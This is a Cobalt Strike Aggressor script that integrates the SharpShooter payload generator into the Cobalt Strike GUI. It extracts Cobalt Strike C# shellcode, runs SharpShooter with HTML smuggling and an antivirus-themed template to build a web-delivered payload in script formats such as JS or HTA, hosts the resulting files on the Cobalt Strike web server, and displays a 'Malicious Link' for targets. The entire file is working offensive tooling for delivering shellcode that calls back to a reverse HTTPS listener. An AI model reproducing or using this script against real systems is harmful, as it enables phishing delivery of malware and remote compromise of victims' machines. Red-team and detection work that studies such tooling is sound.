#
# Integration with cobalt strike GUI
# 
# Use: 
# 	Load the sharpshooter.cna script in cobalt strike
#	A new menu option shows up called "SharpShooter"
#	At this time, the dialog that pops up doesn't allow you to specify all SharpShooter options
#
#	1 Menu->Attacks->Packages->PayloadGenerator->C#
#	2 Menu->SharpShooter
#	
# Why?
# 	This make using SharpShooter with cobaltstrike a little easier because:
# 	- It runs the script from dialog input so you don't have to worry about spelling mistakes or remembering what the names of files are
# 	- It hosts the file on the cobalt strike web server 
# 	- It strips the unnecessary head and tail from the C# payload generated by cobalt strike 
#
# Tested and working with:
#	Listener: Reverse HTTPS
#	Payload:  C#/x64
#	.NET: 	  2
#	Format:   JS
#	Target: Win7SP1 Enterprise	
#

menubar("&SharpShooter", "sharpshooter");

popup sharpshooter {
sub callback {
#	println("Dialogo  was actioned. Button: $2 Values: $3");
#	$commandline = "python SharpShooter.py --payload $3['pload'] --delivery web --web http://$3['host']\/download\/$3['oname']\.payload --shellcode --scfile $3['scode'] --smuggle --template mcafee --dotnetver $3['dotnet'] --output $3['oname']";

	$parentdir = getFileParent($3['execdir']);
#	println($parentdir);

#	open the c# payload file create a string from it
	$cscodehandle = openf($3['scode']);
	while $scodetext (readln($cscodehandle))
	{
	    $cscodefile = "$cscodefile $+ $scodetext";
	}
	closef($cscodehandle);

#	we only want the stuff between the brackets (only the bytes)
	$startbytes = lindexOf($cscodefile, "{");
	$endbytes = lindexOf($cscodefile, "}");

	$justthebytes = substr($cscodefile, $startbytes + 1 , $endbytes );
	$justthebytesfilename = "$3['scode']\.bytes";

#	println("JUSTTHEBYTESFILE: $justthebytesfilename");

#	Create a new file to use with sharpshooter
	$justthebytesfilehandle = openf("> $+ $justthebytesfilename");
	println($justthebytesfilehandle, $justthebytes);
	closef($justthebytesfilehandle);

	$commandline = "python SharpShooter.py --payload $3['pload'] --delivery web --web http://$3['host']\/download\/$3['oname']\.payload --shellcode --scfile $justthebytesfilename --smuggle --template mcafee --dotnetver $3['dotnet'] --output $3['oname']";

#	println("JUSTTHEBYTES\n");
#	println($justthebytes);
#	println("\n");

	println($commandline);

	$process = exec($commandline, $null, $parentdir);
	@data = readAll($process);

#	Show the output from the sharpshooter script
	printAll(@data);
	closef($process);

#	HTML file URI
	$huri = "/download\/$3['oname']\.html";
#	PAYLOAD file URI
 	$puri = "/download\/$3['oname']\.payload";
	
#	sharpshooter generated HTML file
	$huripath = "$parentdir\/output\/$3['oname']\.html";
#	sharpshooter generated PAYLOAD file
	$puripath = "$parentdir\/output\/$3['oname']\.payload";

#	Read HTML file into a string to use with site_host function
	$allofit = "";
	$hurihandle = openf($huripath);
	while $text (readln($hurihandle))
	{
	    $allofit = "$allofit $+ $text";
	}
	closef($hurihandle);
	
#	Read PAYLOAD file into a string to use with the site_host function
	$purihandle = openf($puripath);
	$allpay = "";
	while $paytext (readln($purihandle))
	{
		$allpay = "$allpay $+ $paytext";
	}
	closef($purihandle);

#	Host the files on the web server
	site_host(localip(), 80, $huri, $allofit, "text/html", "none", false); 
	site_host(localip(), 80, $puri, $allpay, "application/octet-stream", "none", false);

	$htmllocation = "http://$3['host']\/$huri";

	# simple dialog to show the target URL and allow copy/paste
	sub closecopyurl {
	}
	$copyurl = dialog("Attack Ready", %(htmlfile => $htmllocation), &closecopyurl);
	drow_text($copyurl, "htmlfile", "Malicious Link: ");
	dialog_show($copyurl);
}

$dialog = dialog("Host File", %(uri => "/download/file.ext", port => 80, host => localip(), mimetype => "automatic"), &callback);
dialog_description($dialog, "Host a file through Cobalt Strike's web server");
	
drow_file($dialog, "execdir", "SharpShooter Script:");
drow_text($dialog, "oname", "Output Name:");
drow_combobox($dialog, "dotnet", "Target .NET Version:", @("2", "4"));
drow_combobox($dialog, "pload", "Payload Format:", @("js", "hta", "jse", "vba", "vbe", "vbs", "wsf"));
drow_file($dialog, "scode", "Cobalt Strike C# Shellcode:");
drow_text($dialog, "host", "Local Host:", 20);
drow_text($dialog, "port", "Local Port:");
drow_combobox($dialog, "listener", "Listener:", listeners_local());
dbutton_action($dialog, "Launch");
dbutton_help($dialog, "https://www.cobaltstrike.com/help-host-file");

dialog_show($dialog);
}
